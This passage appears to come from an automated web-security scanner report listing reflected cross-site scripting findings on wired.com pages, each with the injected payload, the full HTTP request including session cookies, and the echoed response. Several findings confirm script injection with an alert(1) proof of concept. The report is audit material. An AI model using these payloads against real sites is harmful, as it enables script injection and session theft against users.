Content-Length: 29304
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:36 GMT
Date: Sun, 21 Nov 2010 23:07:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_design c_multimediae1447"><a>17257c56c9f">
...[SNIP]...

1.520. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/design/multimedia/2008/06/gallery_trains

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload add6e"><script>alert(1)</script>a2b64047b26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/design/multimedia/2008/06/gallery_trains?add6e"><script>alert(1)</script>a2b64047b26=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:58 GMT
Date: Sun, 21 Nov 2010 23:06:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41077


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/design/multimedia/2008/06/gallery_trains?add6e"><script>alert(1)</script>a2b64047b26=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.521. http://www.wired.com/culture/education [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/education

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c45a8"><a>9f611b39064 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturec45a8"><a>9f611b39064/education HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29263
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:10:03 GMT
Date: Sun, 21 Nov 2010 23:06:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturec45a8"><a>9f611b39064 ss_education">
...[SNIP]...

1.522. http://www.wired.com/culture/education [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/education

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2c85"><a>d84992dbbe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/educationb2c85"><a>d84992dbbe HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29261
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:27 GMT
Date: Sun, 21 Nov 2010 23:06:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_educationb2c85"><a>d84992dbbe">
...[SNIP]...

1.523. http://www.wired.com/culture/lifestyle [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af4cf"><a>703cee33c83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cultureaf4cf"><a>703cee33c83/lifestyle HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29263
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:10:04 GMT
Date: Sun, 21 Nov 2010 23:06:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cultureaf4cf"><a>703cee33c83 ss_lifestyle">
...[SNIP]...

1.524. http://www.wired.com/culture/lifestyle [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f876e"><a>59992d190ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestylef876e"><a>59992d190ca HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29263
Vary: Accept-Encoding
Cache-Control: max-age=588
Expires: Sun, 21 Nov 2010 23:16:19 GMT
Date: Sun, 21 Nov 2010 23:06:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestylef876e"><a>59992d190ca">
...[SNIP]...

1.525. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2007/10/gallery_canned_foods

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95a99"><a>d3ff9573830 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture95a99"><a>d3ff9573830/lifestyle/multimedia/2007/10/gallery_canned_foods HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29316
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:19 GMT
Date: Sun, 21 Nov 2010 23:06:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture95a99"><a>d3ff9573830 ss_lifestyle c_multimedia">
...[SNIP]...

1.526. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2007/10/gallery_canned_foods

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 904b7"><a>ee778010cae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle904b7"><a>ee778010cae/multimedia/2007/10/gallery_canned_foods HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29316
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:37 GMT
Date: Sun, 21 Nov 2010 23:06:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle904b7"><a>ee778010cae c_multimedia">
...[SNIP]...

1.527. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2007/10/gallery_canned_foods

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a306"><a>ecc32f97413 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle/multimedia4a306"><a>ecc32f97413/2007/10/gallery_canned_foods HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29316
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:55 GMT
Date: Sun, 21 Nov 2010 23:06:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle c_multimedia4a306"><a>ecc32f97413">
...[SNIP]...

1.528. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2007/10/gallery_canned_foods

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e513"><script>alert(1)</script>0b37a4181f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/lifestyle/multimedia/2007/10/gallery_canned_foods?7e513"><script>alert(1)</script>0b37a4181f6=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:19 GMT
Date: Sun, 21 Nov 2010 23:06:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42065


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/lifestyle/multimedia/2007/10/gallery_canned_foods?7e513"><script>alert(1)</script>0b37a4181f6=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.529. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2008/11/gallery_vote

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca90b"><a>e339c09d9c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cultureca90b"><a>e339c09d9c5/lifestyle/multimedia/2008/11/gallery_vote HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29308
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:18 GMT
Date: Sun, 21 Nov 2010 23:06:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cultureca90b"><a>e339c09d9c5 ss_lifestyle c_multimedia">
...[SNIP]...

1.530. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2008/11/gallery_vote

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42d5a"><a>f39aa6a9d07 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle42d5a"><a>f39aa6a9d07/multimedia/2008/11/gallery_vote HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29308
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:36 GMT
Date: Sun, 21 Nov 2010 23:06:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle42d5a"><a>f39aa6a9d07 c_multimedia">
...[SNIP]...

1.531. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2008/11/gallery_vote

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31c8a"><a>c696540734e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle/multimedia31c8a"><a>c696540734e/2008/11/gallery_vote HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29308
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:51 GMT
Date: Sun, 21 Nov 2010 23:06:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle c_multimedia31c8a"><a>c696540734e">
...[SNIP]...

1.532. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2008/11/gallery_vote

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26cdb"><script>alert(1)</script>0fe75b71068 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/lifestyle/multimedia/2008/11/gallery_vote?26cdb"><script>alert(1)</script>0fe75b71068=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:17 GMT
Date: Sun, 21 Nov 2010 23:06:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41448


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/lifestyle/multimedia/2008/11/gallery_vote?26cdb"><script>alert(1)</script>0fe75b71068=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.533. http://www.wired.com/culture/lifestyle/news/2005/01/66334 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/news/2005/01/66334

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 127a6"><a>a9774cc0e66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture127a6"><a>a9774cc0e66/lifestyle/news/2005/01/66334 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29289
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:18 GMT
Date: Sun, 21 Nov 2010 23:06:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture127a6"><a>a9774cc0e66 ss_lifestyle c_news">
...[SNIP]...

1.534. http://www.wired.com/culture/lifestyle/news/2005/01/66334 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/news/2005/01/66334

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62a43"><a>9a2824aad23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle62a43"><a>9a2824aad23/news/2005/01/66334 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29289
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:35 GMT
Date: Sun, 21 Nov 2010 23:06:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle62a43"><a>9a2824aad23 c_news">
...[SNIP]...

